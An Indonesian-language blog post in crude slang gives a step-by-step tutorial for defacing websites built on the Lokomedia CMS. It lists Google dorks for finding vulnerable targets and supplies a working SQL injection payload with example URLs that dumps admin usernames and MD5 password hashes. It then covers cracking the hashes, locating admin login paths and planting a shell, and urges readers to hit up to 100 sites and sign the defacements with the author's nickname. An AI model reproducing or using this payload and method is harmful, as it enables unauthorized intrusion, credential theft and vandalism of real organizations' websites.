Cara Deface Poc Sql Lokomedia




Kali ini gua akan ngasih tau cara deface POC SQL LOKOMEDIA

Bahannya coeg:

-Dork


-Shell (di mbah kyta banyak jangan males tod)

-Exploit

-MD5 Decrypter

-Sabun buat coli :v

-Kopi

-Pastinya Internet ea akmj


Pertama, masukin dorknya dulu ea akmj


Dork:

inurl: hal-tentang-kami.html

inurl: hal-profil-kami.html

inurl: hal-visi-dan-misi.html

inurl: statis-1/profil.html

inurl:statis-2/visi-dan-misi.html

inurl:kategori-23-hiburan.html

inurl:statis-1-pengantar.html

inurl:statis-1-pengantar.html

inurl:statis-19-beasiswa.html

inurl:statis-3-strukturorganisasi.html

inurl:kategori-40-

inurl:kategori-2-

inurl:semua-berita.html

inurl:semua-agenda.html


Kembangin dorknya ea akmj biar dapet yg fresh kaya bokep :v


Exploitnya jangan lupa coeg: 'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+.html


Contoh 1: www.targetlu.co.li/hal-tentang-'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+kami.html


Contoh 2: www.targetlu.co.li/statis--1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html


MD5 Decrypter : toolnya Klik Disini kalo ngga Disini

Oke cekidot ea langsung tutornya :

1. Masukin dorknya ke Mbah kita yaitu google.com kalo orang Indonesia bilangnya Gugel hwhw canda gan :v

2. Pilih salah satu target ea kimak, terserah mau satu target, dua target, bahkan sampe 100 target pun nggapapa :v

3. Masukin Exploitnya coeg, contohnya udah di kasih tau diatas

4. Kalo vuln di atas ada tulisan admin,(ada banyak nomor)

5. Tekan CTRL + U, terus Copy MD5 nya, contoh : admin, 875261727262 (angka ngasal :v) copy angkanya coeg lalu paste di MD5 decrypter

6. Kalo udah nemu password-nya sekarang tinggal nyari admin loginnya


Biasanya: http://target.co.li/adminweb

http://target.co.li/admin

http://target.co.li/administrator

http://target.co.li/redaktur


7. Tanem shell? Cari sendiri ea akmj gua cape :v


8. Jangan lupa ea bawa Nick gua Mr.ReposadoCyber

Popular posts from this blog

Dork Carding

Cara Deface POC Open Jurnal System (OJS)

Cara Deface Poc Ajax File Manager